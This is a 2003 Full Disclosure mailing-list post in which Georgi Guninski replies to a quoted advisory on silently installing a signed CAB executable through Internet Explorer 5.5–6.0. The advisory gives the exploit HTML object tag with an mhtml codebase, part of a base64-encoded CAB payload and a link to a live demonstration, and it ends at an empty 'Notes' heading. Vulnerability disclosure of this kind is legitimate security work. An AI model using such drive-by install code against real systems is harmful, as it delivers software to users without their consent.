Full Disclosure mailing list archives

Re: SILLY BEHAVIOR Part III : Internet Explorer 5.5 - 6.0

From: Georgi Guninski <guninski () guninski com>
Date: Mon, 05 May 2003 16:40:24 +0300

Has the users at microsoft fixed reinstalling of bugware signed by them?
outlctl.dll (amongst other stuff) used to be a disguised frontend to cmd.exe and was quite signed. IIRC at a time microsoft even wrote in a security bulletin: "remove us from the trusted publishers in exploder" - has this changed, i.e. are they *now* claiming
they are a trusthworthy publisher again?

Georgi

Sunday, May 4, 2003

Silent delivery and installation of an executable on the target machine, default install of win98 and Internet Explorer with all patches to date. No client input other than viewing a web page:

Mildly amused by the recent patching of the codebase saga spanning nearly 3 years now, we put on our thinking caps and come to the very simple, yet delicious conclusion:

As below we are able to inject arbitrary html into the local computer zone thus bypassing the browser's security. Nevertheless the codebase exploits as detailed time and time again, now no longer function, returning the standard active x error or security warning.

BUT !

there is a very specific reason for that and to bypass it, we do like so:

----local.html----

<object CLASSID="CLSID:55555555-5555" codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
File://malware.cab">

----local.html----

and where our:

---wecerr.txt---

TVNDRgAAAAAyQAYAAAAAAEQAAAAAAAAAAwEBAAIABADJBwAAFAAAAAAAEAAyQAYAgBUAAA
AAAAAA

---wecerr.txt---

contains a "signed" cab file.  The digital signature is our key.

Provided the executable is signed, we are again able to install via the codebase object, from the local machine and without any prompts or warnings. Certainly we would not expect malware to be digitally signed out in the wild, but for what it is worth, we are back in business.

Working Example

http://www.malware.com/aha.html

Caution:

a) for demonstration purposes we use the ubiquitous flash file [.cab file] as it is both signed and benign and you are able to visually see the install:

[screen shot: http://www.malware.com/aha.png 14KB]

b) the custom crafted wecerr.txt weighs in at a hefty 555 KB, and can take a short while to download:

[screen shot: http://www.malware.com/ah.png 4KB]

once downloaded, simply take the:

----local.html----

<object CLASSID="CLSID:55555555-5555" codebase="mhtml:file:///C:\WINDOWS\Temp\wecerr.txt!
File://malware.cab">

----local.html----

and away you go.

Notes: